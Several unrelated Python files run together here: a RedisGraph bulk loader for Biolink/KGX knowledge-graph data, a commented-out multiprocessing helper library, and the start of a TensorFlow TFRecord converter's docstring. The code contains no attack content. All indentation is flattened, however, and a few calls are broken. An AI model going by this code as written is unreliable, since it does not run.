# Keep track of things like "MacromolecularMachine" in current datasets
# @TODO remove this and make nodes as errors
unknown_elements = set()
for x in all_concepts:
current_element = self.toolkit.get_element(x)
mixins = set()
if current_element:
if 'mixins' in current_element and len(current_element['mixins']):
for m in current_element['mixins']:
mixins.add(self.toolkit.get_element(m).class_uri)
else:
unknown_elements.add(x)
ancestors = set(self.toolkit.get_ancestors(x, reflexive=False, formatted=True))
ancestry_set = ancestry_set.union(ancestors)
all_mixins_in_tree = all_mixins_in_tree.union(mixins)
leaf_set = all_concepts - ancestry_set - all_mixins_in_tree - unknown_elements
return leaf_set
def get_leaf_class (self, names):
""" Return the leaf classes in the provided list of names. """
leaves = list(self.find_biolink_leaves(names))
return leaves[0]
def get_label(self, class_name):
element = self.toolkit.get_element(class_name)
if element:
name = element.name
return name
return class_name.replace("biolink:", "").replace("_", " ")
class BulkLoad:
""" Tools for creating a Redisgraph bulk load dataset. """
def __init__(self, biolink, config=None):
self.biolink = biolink
if not config:
config = get_config()
self.config = config
separator = self.config.get('bulk_loader',{}).get('separator', '|')
self.separator = chr(separator) if isinstance(separator, int) else separator
def tables_up_to_date (self):
return Util.is_up_to_date (
source=[
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json"),
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json")
] + Util.merged_objects (),
targets=glob.glob (Util.bulk_path ("nodes/**.csv")) + \
glob.glob (Util.bulk_path ("edges/**.csv")))
def create_nodes_csv_file(self):
if self.tables_up_to_date ():
log.info ("up to date.")
return
# clear out previous data
bulk_path = Util.bulk_path("nodes")
if os.path.exists(bulk_path):
shutil.rmtree(bulk_path)
categories_schema = Util.read_schema (SchemaType.CATEGORY)
state = defaultdict(lambda: None)
log.info(f"processing nodes")
""" Write node data for bulk load. """
categories = defaultdict(lambda: [])
category_error_nodes = set()
merged_nodes_file = Util.merge_path("nodes.jsonl")
counter = 1
for node in Util.json_line_iter(merged_nodes_file):
if not node['category']:
category_error_nodes.add(node['id'])
node['category'] = [BiolinkModel.root_type]
index = self.biolink.get_leaf_class(node['category'])
categories[index].append(node)
if len(category_error_nodes):
log.error(f"some nodes didn't have category assigned. KGX file has errors."
f"Nodes {len(category_error_nodes)}. They will be typed {BiolinkModel.root_type}"
f"Showing first 10: {list(category_error_nodes)[:10]}.")
# flush every 100K
if counter % 100_000 == 0:
self.write_bulk(Util.bulk_path("nodes"), categories, categories_schema,
state=state, is_relation=False)
# reset variables.
category_error_nodes = set()
categories = defaultdict(lambda: [])
counter += 1
# write back if any thing left.
if len(categories):
self.write_bulk(Util.bulk_path("nodes"), categories, categories_schema,
state=state, is_relation=False)
def create_edges_csv_file(self):
""" Write predicate data for bulk load. """
if self.tables_up_to_date ():
log.info ("up to date.")
return
# Clear out previous data
bulk_path = Util.bulk_path("edges")
if os.path.exists(bulk_path):
shutil.rmtree(bulk_path)
predicates_schema = Util.read_schema(SchemaType.PREDICATE)
predicates = defaultdict(lambda: [])
edges_file = Util.merge_path('edges.jsonl')
counter = 1
state = {}
for edge in Util.json_line_iter(edges_file):
predicates[edge['predicate']].append(edge)
# write out every 100K , to avoid large predicate dict.
if counter % 100_000 == 0:
self.write_bulk(Util.bulk_path("edges"), predicates, predicates_schema, state=state, is_relation=True)
predicates = defaultdict(lambda : [])
counter += 1
# if there are some items left (if loop ended before counter reached the specified value)
if len(predicates):
self.write_bulk(Util.bulk_path("edges"), predicates, predicates_schema, state=state, is_relation=True)
@staticmethod
def create_redis_schema_header(attributes: dict, is_relation=False):
"""
Creates col headers for csv to be used by redis bulk loader by assigning redis types
:param attributes: dictionary of data labels with values as python type strings
:param separator: CSV separator
:return: list of attributes where each item is attributeLabel:redisGraphDataType
"""
redis_type_conversion_map = {
'str': 'STRING',
'float': 'FLOAT', # Do we need to handle double
'int': 'INT',
'bool': 'BOOL',
'list': 'ARRAY'
}
col_headers = []
format_for_redis = lambda label, typ: f'{label}:{typ}'
for attribute, attribute_type in attributes.items():
col_headers.append(format_for_redis(attribute, redis_type_conversion_map[attribute_type]))
# Note this two fields are only important to bulk loader
# they will not be members of the graph
# https://github.com/RedisGraph/redisgraph-bulk-loader/tree/master#input-schemas
if is_relation:
col_headers.append('internal_start_id:START_ID')
col_headers.append('internal_end_id:END_ID')
# replace id:STRING with id:ID
col_headers.append('id:ID')
col_headers = list(filter(lambda x: x != 'id:STRING', col_headers))
return col_headers
@staticmethod
def group_items_by_attributes_set(objects: list, processed_object_ids: set):
"""
Groups items into a dictionary where the keys are sets of attributes set for all
items accessed in that key.
Eg. { set(id,name,category): [{id:'xx0',name:'bbb', 'category':['type']}....
{id:'xx1', name:'bb2', category: ['type1']}] }
:param objects: list of nodes or edges
:param processed_object_ids: ids of object to skip since they are processed.
:return: dictionary grouping based on set attributes
"""
clustered_by_set_values = {}
improper_keys = set()
value_set_test = lambda x: True if (x is not None and x != [] and x != '') else False
for obj in objects:
# redis bulk loader needs columns not to include ':'
# till backticks are implemented we should avoid these.
key_filter = lambda k: ':' not in k
keys_with_values = frozenset([k for k in obj.keys() if value_set_test(obj[k]) and key_filter(k)])
for key in [k for k in obj.keys() if obj[k] and not key_filter(k)]:
improper_keys.add(key)
# group by attributes that have values. # Why?
# Redis bulk loader has one issue
# imagine we have {'name': 'x'} , {'name': 'y', 'is_metabolite': true}
# we have a common schema name:STRING,is_metabolite:BOOL
# values `x, ` and `y,true` but x not having value for is_metabolite is not handled
# well, redis bulk loader says we should give it default if we were to enforce schema
# but due to the nature of the data assigning defaults is very not an option.
# hence grouping data into several csv's might be the right way (?)
if obj['id'] not in processed_object_ids:
clustered_by_set_values[keys_with_values] = clustered_by_set_values.get(keys_with_values, [])
clustered_by_set_values[keys_with_values].append(obj)
return clustered_by_set_values, improper_keys
def write_bulk(self, bulk_path, obj_map, schema, state={}, is_relation=False):
""" Write a bulk load group of objects.
:param bulk_path: Path to the bulk loader object to write.
:param obj_map: A map of biolink type to list of objects.
:param schema: The schema (nodes or predicates) containing identifiers.
:param state: Track state of already written objects to avoid duplicates.
"""
os.makedirs (bulk_path, exist_ok=True)
processed_objects_id = state.get('processed_id', set())
called_x_times = state.get('called_times', 0)
called_x_times += 1
for key, objects in obj_map.items ():
if len(objects) == 0:
continue
all_keys = schema[key]
""" Make all objects conform to the schema. """
clustered_by_set_values, improper_redis_keys = self.group_items_by_attributes_set(objects,
processed_objects_id)
if len(improper_redis_keys):
log.warning(f"The following keys were skipped since they include conflicting `:`"
f" that would cause errors while bulk loading to redis."
f"{improper_redis_keys}")
for index, set_attributes in enumerate(clustered_by_set_values.keys()):
items = clustered_by_set_values[set_attributes]
# When parted files are saved let the file names be collected here
state['file_paths'] = state.get('file_paths', {})
state['file_paths'][key] = state['file_paths'].get(key, {})
out_file = state['file_paths'][key][set_attributes] = state['file_paths']\
.get(key, {})\
.get(set_attributes, '')
# When calling write bulk , lets say we have processed some
# chemicals from file 1 and we start processing file 2
# if we are using just index then we might (rather will) end up adding
# records to the wrong file so we need this to be unique as possible
# by adding called_x_times , if we already found out-file from state obj
# we are sure that the schemas match.
# biolink:<TYPE> is not valid name so we need to remove :
file_key = key.replace(':', '~')
out_file = f"{bulk_path}/{file_key}.csv-{index}-{called_x_times}" if not out_file else out_file
state['file_paths'][key][set_attributes] = out_file # store back file name
new_file = not os.path.exists(out_file)
keys_for_header = {x: all_keys[x] for x in all_keys if x in set_attributes}
redis_schema_header = self.create_redis_schema_header(keys_for_header, is_relation)
with open(out_file, "a", encoding='utf-8') as stream:
if new_file:
state['file_paths'][key][set_attributes] = out_file
log.info(f" --creating {out_file}")
stream.write(self.separator.join(redis_schema_header))
stream.write("\n")
else:
log.info(f" --appending to {out_file}")
""" Write fields, skipping duplicate objects. """
for obj in items:
oid = str(obj['id'])
if oid in processed_objects_id:
continue
processed_objects_id.add(oid)
""" Add ID / START_ID / END_ID depending"""
internal_id_fields = {
'internal_id': obj['id']
}
if is_relation:
internal_id_fields.update({
'internal_start_id': obj['subject'],
'internal_end_id': obj['object']
})
obj.update(internal_id_fields)
values = []
# uses redis schema header to preserve order when writing lines out.
for column_name in redis_schema_header:
# last key is the type
obj_key = ':'.join(column_name.split(':')[:-1])
value = obj[obj_key]
if obj_key not in internal_id_fields:
current_type = type(value).__name__
expected_type = all_keys[obj_key]
# cast it if it doesn't match type in schema keys i.e all_keys
value = TypeConversionUtil.cast(obj[obj_key], all_keys[obj_key]) \
if expected_type != current_type else value
# escape quotes .
values.append(str(value).replace("\"", "\\\""))
s = self.separator.join(values)
stream.write(s)
stream.write("\n")
state['processed_id'] = processed_objects_id
state['called_times'] = called_x_times
def insert (self):
redisgraph = {
'host': os.getenv('REDIS_HOST'),
'port': os.getenv('REDIS_PORT', 6379),
'password': os.getenv('REDIS_PASSWORD'),
'graph': os.getenv('REDIS_GRAPH'),
}
redisgraph = self.config.redisgraph
nodes = sorted(glob.glob (Util.bulk_path ("nodes/**.csv*")))
edges = sorted(glob.glob (Util.bulk_path ("edges/**.csv*")))
graph = redisgraph['graph']
log.info(f"bulk loading \n nodes: {nodes} \n edges: {edges}")
try:
log.info (f"deleting graph {graph} in preparation for bulk load.")
db = self.get_redisgraph()
db.redis_graph.delete ()
except redis.exceptions.ResponseError:
log.info("no graph to delete")
log.info (f"bulk loading graph: {graph}")
args = []
if len(nodes) > 0:
bulk_path_root = Util.bulk_path('nodes') + os.path.sep
nodes_with_type = [ f"{ x.replace(bulk_path_root, '').split('.')[0].replace('~', ':')} {x}"
for x in nodes ]
args.extend(("-N " + " -N ".join(nodes_with_type)).split())
if len(edges) > 0:
bulk_path_root = Util.bulk_path('edges') + os.path.sep
edges_with_type = [ f"{x.replace(bulk_path_root, '').strip(os.path.sep).split('.')[0].replace('~', ':')} {x}"
for x in edges]
args.extend(("-R " + " -R ".join(edges_with_type)).split())
args.extend([f"--separator={self.separator}"])
args.extend([f"--host={redisgraph['host']}"])
args.extend([f"--port={redisgraph['port']}"])
args.extend([f"--password={redisgraph['password']}"])
args.extend(['--enforce-schema'])
args.extend([f"{redisgraph['graph']}"])
""" standalone_mode=False tells click not to sys.exit() """
log.debug(f"Calling bulk_insert with extended args: {args}")
try:
bulk_insert (args, standalone_mode=False)
except Exception as e:
log.error(f"Unexpected {e.__class__.__name__}: {e}")
raise
def get_redisgraph(self):
return RedisGraph(
host=self.config.redisgraph.host,
port=self.config.redisgraph.port,
password=self.config.redisgraph.password,
graph=self.config.redisgraph.graph,
)
def validate(self):
db = self.get_redisgraph()
validation_queries = config.get('validation', {}).get('queries', [])
for key, query in validation_queries.items ():
text = query['query']
name = query['name']
args = query.get('args', [{}])
for arg in args:
start = Util.current_time_in_millis ()
instance = Template (text).safe_substitute (arg)
db.query (instance)
duration = Util.current_time_in_millis () - start
log.info (f"Query {key}:{name} ran in {duration}ms: {instance}")
def wait_for_tranql(self):
retry_secs = 3
tranql_endpoint = self.config.indexing.tranql_endpoint
log.info(f"Contacting {tranql_endpoint}")
graph_name = self.config["redisgraph"]["graph"]
test_query = "SELECT disease-> phenotypic_feature " \
f"FROM 'redis:{graph_name}'" \
f"WHERE disease='MONDO:0004979'"
is_done_loading = False
try:
while not is_done_loading:
response = requests.post(tranql_endpoint, data=test_query)
response_code = response.status_code
response = response.json()
is_done_loading = "message" in response and response_code == 200
if is_done_loading:
break
else:
log.info(f"Tranql responsed with response: {response}")
log.info(f"Retrying in {retry_secs} secs...")
time.sleep(retry_secs)
except ConnectionError as e:
# convert exception to be more readable.
raise ConnectionError(f"Attempting to contact {tranql_endpoint} failed due to connection error. "
f"Please check status of Tranql server.")
class Roger:
""" Consolidate Roger functionality for a cleaner interface. """
def __init__(self, to_string=False, config=None):
""" Initialize.
:param to_string: Log messages to a string, available as self.log_stream.getvalue()
after execution completes.
"""
import logging
self.has_string_handler = to_string
if not config:
config = get_config()
self.config = config
if to_string:
""" Add a stream handler to enable to_string. """
self.log_stream = StringIO()
self.string_handler = logging.StreamHandler (self.log_stream)
log.addHandler (self.string_handler)
self.biolink = BiolinkModel (config.kgx.biolink_model_version)
self.kgx = KGXModel (self.biolink, config=config)
self.bulk = BulkLoad (self.biolink, config=config)
def __enter__(self):
""" Implement Python's Context Manager interface. """
return self
def __exit__(self, exception_type, exception_value, traceback):
""" Implement Python's Context Manager interface. We use this finalizer
to detach the stream handler appended in the constructor.
:param exception_type: Type of exception, if one occurred.
:param exception_value: The exception, if one occurred.
:param traceback: The stack trace explaining the exception.
"""
if exception_type or exception_value or traceback:
log.error (msg="Error:", exc_info=(exception_type, exception_value, traceback))
if self.has_string_handler:
log.removeHandler (self.string_handler)
class RogerUtil:
""" An interface abstracting Roger's inner workings to make it easier to
incorporate into external tools like workflow engines. """
@staticmethod
def get_kgx (to_string=False, config=None):
output = None
log.debug("Getting KGX method called.")
with Roger (to_string, config=config) as roger:
dataset_version=config.get('kgx', {}).get('dataset_version')
roger.kgx.get (dataset_version=dataset_version)
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def create_schema (to_string=False, config=None):
o1 = RogerUtil.create_nodes_schema(to_string=to_string, config=config)
o2 = RogerUtil.create_edges_schema(to_string=to_string, config=config)
output = (o1 + o2 ) if to_string else None
return output
@staticmethod
def create_edges_schema(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.kgx.create_edges_schema()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def create_nodes_schema(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.kgx.create_nodes_schema()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def merge_nodes (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.kgx.merge ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def create_bulk_load (to_string=False, config=None):
o1 = RogerUtil.create_bulk_nodes(to_string=to_string, config=config)
o2 = RogerUtil.create_bulk_edges(to_string=to_string, config=config)
output = (o1 + o2) if to_string else None
return output
@staticmethod
def create_bulk_nodes(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.create_nodes_csv_file()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def create_bulk_edges(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.create_edges_csv_file()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def bulk_load (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.bulk.insert ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def validate (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.bulk.validate ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def check_tranql(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.wait_for_tranql()
output = roger.log_stream.getvalue() if to_string else None
return output
if __name__ == "__main__":
""" Roger CLI. """
parser = argparse.ArgumentParser(description='Roger')
parser.add_argument('-v', '--dataset-version', help="Dataset version.", default="v1.0")
parser.add_argument('-d', '--data-root', help="Root of data hierarchy", default=None)
parser.add_argument('-g', '--get-kgx', help="Get KGX objects", action='store_true')
parser.add_argument('-l', '--load-kgx', help="Load via KGX", action='store_true')
parser.add_argument('-s', '--create-schema', help="Infer schema", action='store_true')
parser.add_argument('-m', '--merge-kgx', help="Merge KGX nodes", action='store_true')
parser.add_argument('-b', '--create-bulk', help="Create bulk load", action='store_true')
parser.add_argument('-i', '--insert', help="Do the bulk insert", action='store_true')
parser.add_argument('-a', '--validate', help="Validate the insert", action='store_true')
args = parser.parse_args ()
biolink = BiolinkModel ()
kgx = KGXModel (biolink)
bulk = BulkLoad (biolink)
if args.data_root is not None:
config = get_config()
data_root = args.data_root
config.update({'data_root': data_root})
log.info (f"data root:{data_root}")
if args.get_kgx:
kgx.get (dataset_version=args.dataset_version)
if args.load_kgx:
kgx.load ()
if args.merge_kgx:
kgx.merge ()
if args.create_schema:
kgx.create_schema ()
if args.create_bulk:
bulk.create ()
if args.insert:
bulk.insert ()
if args.validate:
bulk.validate ()
sys.exit (0)
|
farming.py
|
from humpack.farming import Farmer, make_ghost, Replicator, Parallelizer, replicate, Cloner
# import sys, os
# import torch
# import numpy as np
# import torch.multiprocessing as mp
# import itertools
# import traceback
# class ExceptionWrapper(object):
# r"""Wraps an exception plus traceback to communicate across threads"""
# def __init__(self, exc_info):
# # It is important that we don't store exc_info, see
# # NOTE [ Python Traceback Reference Cycle Problem ]
# self.exc_type = exc_info[0]
# self.exc_msg = "".join(traceback.format_exception(*exc_info))
#
# def _worker_loop(fn, private_args, in_queue, out_queue, unique_args={}, init_fn=None):
# torch.set_num_threads(1)
#
# output_args = None
# if init_fn is not None:
# args = private_args.copy()
# args.update(unique_args)
# try:
# output_args = init_fn(**args)
# except Exception:
# print('failed')
# out_queue.put(ExceptionWrapper(sys.exc_info()))
# return
#
# while True:
# all_args = private_args.copy()
# all_args.update(unique_args)
# if output_args is not None:
# all_args.update(output_args)
#
# args = in_queue.get()
# if args is None:
# break
# try:
# shared_args, volatile_args = args
# all_args.update(shared_args)
# all_args.update(volatile_args)
# output = fn(**all_args)
# except Exception:
# out_queue.put(ExceptionWrapper(sys.exc_info()))
# else:
# out_queue.put(output)
#
# class Farmer(object):
# '''
# Farms computation (of functions with both private and shared args) to other processes
# 4 types of arguments (all of which are dicts):
# - shared_args = arguments to be sent to workers when dispatched from master process
# - private_args = arguments that all workers own privately (eg. data you dont want to pass in each dispatch)
# - unique_worker_args = arguments that each worker owns privately (eg. random seeds)
# - volatile_args = arguments generated and sent for each dispatch
#
# '''
# def __init__(self, fn, shared_args={}, private_args={}, unique_worker_args=None, volatile_gen=None,
# init_fn=None, num_workers=0, timeout=20, waiting=None, auto_dispatch=True):
# '''
#
# :param fn:
# :param shared_args:
# :param private_args:
# :param unique_worker_args:
# :param volatile_gen:
# :param init_fn:
# :param num_workers:
# :param timeout:
# :param waiting:
# :param auto_dispatch:
# '''
#
# if unique_worker_args is not None:
# try:
# num_workers = len(unique_worker_args)
# except TypeError:
# pass
#
# self.num_workers = num_workers
# self.shared_args = shared_args
# self.volatile_gen = volatile_gen
# self.timeout = timeout
# self.workers = None
#
# self.in_queue = mp.Queue()
# self.outstanding = 0
# self.auto_dispatch = auto_dispatch
#
# self.dispatch_num = 1
#
# if num_workers > 0:
# if unique_worker_args is not None: # list of dicts
# assert len(unique_worker_args) == num_workers
# else:
# unique_worker_args = [{}] * num_workers
#
# self.out_queue = mp.Queue()
# self.workers = [
# mp.Process(target=_worker_loop, args=(fn, private_args, self.in_queue, self.out_queue, u, init_fn))
# for i, u in enumerate(unique_worker_args)]
#
# for w in self.workers:
# w.daemon = True # ensure that the worker exits on process exit
# w.start()
#
# if waiting is None:
# waiting = num_workers if auto_dispatch else 0
# self._dispatch(waiting)
#
# else:
# self.fn = fn
# self.args = private_args.copy()
# if init_fn is not None:
# output_args = init_fn(**private_args)
# if output_args is not None:
# self.args.update(output_args)
#
# def _get_volatile_args(self):
# if self.volatile_gen is not None:
# return next(self.volatile_gen)
# return {}
#
# def _dispatch(self, n=1, args=None):
# if args is None:
# args = self.shared_args
# for _ in range(n):
# try:
# self.in_queue.put((args, self._get_volatile_args()))
# self.outstanding += 1
# except StopIteration:
# pass
#
# def dispatch(self, **kwargs):
# self._dispatch(self.dispatch_num, args=kwargs.update(self.shared_args))
#
# def __len__(self):
# return self.outstanding
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.auto_dispatch:
# self._dispatch()
# if self.outstanding == 0:
# raise StopIteration
# if self.workers is None: # apply fn in this process
# args = self.args.copy()
# shared_args, volatile_args = self.in_queue.get()
# self.outstanding -= 1
# args.update(shared_args)
# args.update(volatile_args)
# return self.fn(**args)
# output = self.out_queue.get(timeout=self.timeout)
# self.outstanding -= 1
# if isinstance(output, ExceptionWrapper):
# try:
# raise output.exc_type(output.exc_msg)
# except:
# print('***ERROR: Exception of type {} occurred'.format(output.exc_type))
# raise Exception(output.exc_msg)
# #quit()
# return output
#
# def __del__(self):
# if self.workers is not None:
# for _ in self.workers:
# self.in_queue.put(None)
#
#
# def make_ghost(source, execute=None):
# '''
# upon anything done to a ghost instance it will check the 'source' for the correct behavior
# and will call 'execute' with the function and args
#
# :param execute: should be callable with signature: execute(fn, args=[], kwargs={})
# :param source: class which contains the functionality
# :return: Ghost object which can be used to execute functions from 'source' in 'parent'
# '''
#
# if execute is None:
# def execute(fn, args=[], kwargs={}):
# return fn(*args, **kwargs)
#
# def make_listener(fn):
# def listener(*args, **kwargs):
# return execute(fn, args, kwargs)
# return listener
#
# class Ghost(object):
# def __getattr__(ignore, item):
# #print('rpl', item)
# if hasattr(source, item): # any method in obj_type
# return make_listener(getattr(source, item))
#
# return execute(getattr, args=[item])
#
# # NOTE: use r.__len__()
# #def __len__(ignore):
# # raise Exception('Python error: len(r) doesn\'t work on replicas, use r.__len__() instead')
#
# def __setattr__(self, key, value):
# execute(getattr(source, '__setattr__'), args=[key, value])
#
# def __delattr__(self, item):
# execute(getattr(source, '__delattr__'), args=[item])
#
# def __getitem__(ignore, item):
# return execute(getattr(source, '__getitem__'), args=[item])
#
# def __iter__(self):
# return itertools.zip_longest(*execute(getattr(source, '__iter__')))
#
# def __add__(ignore, other):
# return execute(getattr(source, '__add__'), args=[other])
#
# return Ghost()
#
#
# # Init fn for any replica (used by Replicator, Parallelizer, and Cloner) - creates instance of replicated object
# def _replica_init(obj_type, init_args, init_kwargs, unique_init_kwargs={}):
# init_kwargs.update(unique_init_kwargs)
# return {'obj': obj_type(*init_args, **init_kwargs)}
#
# # Run fn for any replica (used by Replicator, Parallelizer, and Cloner) - applies function to be executed to instance
# def _replica_run(obj, fn, args, kwargs, **other_args):
# try:
# return fn(obj, *args, **kwargs)
# except Exception as e:
# return e
#
# class Replicator(object): # see 'replicate' function below
# def __init__(self, obj_type, replicas=None, unique_init_kwargs=None, init_args=[], init_kwargs={},
# timeout=20, collate=True):
#
# assert replicas is not None or unique_init_kwargs is not None, 'not sure how many replicas to make'
# if replicas is None:
# replicas = len(unique_init_kwargs)
# self.replicas = replicas
#
# replica_init_args = {
# 'obj_type': obj_type,
# 'init_args': init_args,
# 'init_kwargs': init_kwargs,
# }
#
# if replicas > 0:
# if unique_init_kwargs is not None: # list of dicts
# assert len(unique_init_kwargs) == replicas
# else:
# unique_init_kwargs = [{}] * replicas
#
# self.in_queues = np.array([mp.Queue() for _ in range(replicas)])
# self.out_queues = np.array([mp.Queue() for _ in range(replicas)])
# self.workers = [
# mp.Process(target=_worker_loop, args=(
# _replica_run, replica_init_args, in_q, out_q, {'unique_init_kwargs': unique}, _replica_init))
# for i, (unique, in_q, out_q) in enumerate(zip(unique_init_kwargs, self.in_queues, self.out_queues))]
#
# for w in self.workers:
# w.daemon = True # ensure that the worker exits on process exit
# w.start()
#
# else: # creates an invisible wrapper
# assert unique_init_kwargs is None
# self.obj = _replica_init(**replica_init_args)['obj']
#
# self.obj_type = obj_type
# self.collate = collate
# self._idx = None
# self.timeout = timeout
#
# def __len__(self):
# return self.replicas
#
# def _idx_execute(self, sel):
#
# if len(sel) == 0:
# return make_ghost(self.obj_type, self._execute)
#
# options = np.arange(self.replicas)
#
# idx = []
# for s in sel:
# new = options[s]
# try:
# idx.extend(new)
# except:
# idx.append(new)
#
# def execute_idx(fn=None, args=[], kwargs={}):
# return self._execute(fn, args, kwargs, idx=idx)
# return make_ghost(self.obj_type, execute_idx)
#
# def __call__(self, *sel):
# return self._idx_execute(sel)
#
# def __getitem__(self, sel):
# if isinstance(sel, (int, slice)):
# sel = [sel]
# return self._idx_execute(sel)
#
# def _execute(self, fn=None, args=[], kwargs={}, idx=None):
#
# shared_args = {
# 'args': args,
# 'kwargs': kwargs,
# 'fn': fn,
# }
#
# # dispatch job
# if self.replicas == 0:
# #print(fn, args, kwargs)
# return fn(self.obj, *args, **kwargs)
#
# in_queues = self.in_queues
# out_queues = self.out_queues
#
# if idx is not None:
# in_queues = in_queues[idx]
# out_queues = out_queues[idx]
#
# for in_q in in_queues:
# in_q.put((shared_args, {}))
#
# output = []
# for out_q in out_queues:
# output.append(out_q.get(timeout=self.timeout))
# if isinstance(output[-1], ExceptionWrapper):
# raise output.exc_type(output.exc_msg)
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
#
# class Parallelizer(Replicator): # see 'replicate' function below
# #def __init__(self, *args, **kwargs):
# # super(Parallelizer, self).__init__(*args, **kwargs)
#
# def _execute(self, fn=None, args=[], kwargs={}, idx=None):
#
# # dispatch job
# if self.replicas == 0:
# # print(fn, args, kwargs)
# return fn(self.obj, *args, **kwargs)
#
# in_queues = self.in_queues
# out_queues = self.out_queues
#
# if idx is not None:
# in_queues = in_queues[idx]
# out_queues = out_queues[idx]
#
# jlen = len(in_queues)
#
# if len(args) > 0:
# assert len(args[0]) == jlen
# args = zip(*args)
# else:
# args = [[]] * jlen
#
# if len(kwargs) > 0:
# # uncollate kwargs
# kwargs = [{k: v[i] for k, v in kwargs.items()} for i in range(jlen)]
# else:
# kwargs = [{}] * jlen
#
# for in_q, a, k in zip(in_queues, args, kwargs):
# in_q.put(({'args': a, 'kwargs': k, 'fn': fn}, {}))
#
# output = []
# for out_q in out_queues:
# output.append(out_q.get(timeout=self.timeout))
# if isinstance(output[-1], ExceptionWrapper):
# raise output.exc_type(output.exc_msg)
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
#
# def replicate(*args, separate_args=False, ghost=False, **kwargs):
# '''
# Creates replica objects for multiprocessing. Each process contains a unique instance of the same class ('obj_type').
#
# There are 2 types of managers: Replicators and Parallelizers (chosen using 'separate_args')
# Replicator - all replicas take the same arguments when called
# Parallelizer - each replica takes different arguments (passed in as a list)
#
# Subsets of replicas may be addressed by indexing or calling the manager. If 'ghost' is true a ghost object will be
# returned in a addition to the manager which will apply anything done to that object to all replicas
#
# import time
# class Example:
# def f(self, i):
# time.sleep(0.5)
# print(i)
# return i+1
#
# replicator, ghost = replicate(Example, replicas=8, ghost=True)
#
# replicator(4).f(5) # executes f on replica 4
# replicator[0,2:6].f(5) # executes f on replicas 0 and 2:6
# replicator[0,0].f(5) # executes f on replica 0 twice
# replicator().f(5) # executes f on all replicas
# ghost.f(5) # executes f on all replicas
#
# # parallelizers have the same behavior except for each arg and kwarg a list the same length as the number of replicas to be executed must be passed in.
#
# :param args: for manager (check Replicator)
# :param separate_args: if true, then for each argument in the source function, a list of arguments must be passed one for each replica
# :param kwargs: for manager (check Replicator
# :return: manager, replicas (essentially a voodoo doll)
# '''
#
# Manager = Parallelizer if separate_args else Replicator
#
# manager = Manager(*args, **kwargs)
#
# if not ghost:
# return manager
#
# replicas = make_ghost(manager.obj_type, manager._execute)
#
# return manager, replicas # anything done to the replicas object will be applied in parallel to all replicas, replicator holds info about replicas
#
#
# class Cloner(Farmer):
# '''
# executes any method in 'obj_type' N (default=num_workers) times with the same args using a pool of 'num_workers' workers
#
# unique init args can be passed to each worker, but args to all workers for each dispatch will be the same
#
# example:
#
# import time
# class Example:
# def f(self, i):
# time.sleep(0.5)
# print(i)
# return i+1
#
# clones = Cloner(Example, num_workers=4)
#
# out = clones(8).f(5)
# # takes about 1 sec and prints "5" 8 times
# # 'out' now contains [6, 6, 6, 6, 6, 6, 6, 6]
#
# '''
# def __init__(self, obj_type, default_N=None, init_args=[], init_kwargs={}, unique_worker_args=None,
# num_workers=0, collate=True, timeout=20):
#
# assert num_workers is not None or unique_worker_args is not None, 'must specify how many workers to use'
#
# if unique_worker_args is not None:
# unique_worker_args = [{'unique_init_kwargs': unique} for unique in unique_worker_args]
# num_workers = len(unique_worker_args)
#
# worker_init_args = {
# 'obj_type': obj_type,
# 'init_args': init_args,
# 'init_kwargs': init_kwargs,
# }
#
# super(Cloner, self).__init__(fn=_replica_run, init_fn=_replica_init,
# private_args=worker_init_args, unique_worker_args=unique_worker_args,
# num_workers=num_workers, auto_dispatch=False, timeout=timeout)
# self.default_N = max(num_workers, 1) if default_N is None else default_N
# self.obj_type = obj_type
# self.collate = collate
#
# #self.clones = make_ghost(self.obj_type, self._execute)
#
# def __call__(self, N=None):
# def execute_N(fn=None, args=[], kwargs={}):
# return self._execute(fn, args, kwargs, N)
# return make_ghost(self.obj_type, execute_N)
#
# def _execute(self, fn=None, args=[], kwargs={}, N=None): # execution should not change the state of the clone
#
# self.shared_args = {
# 'args': args,
# 'kwargs': kwargs,
# 'fn': fn,
# }
#
# if N is None:
# N = self.default_N
#
# # dispatch job
# self._dispatch(N)
#
# # collect responses
# output = [out for out in self]
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
|
build_image_data.py
|
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
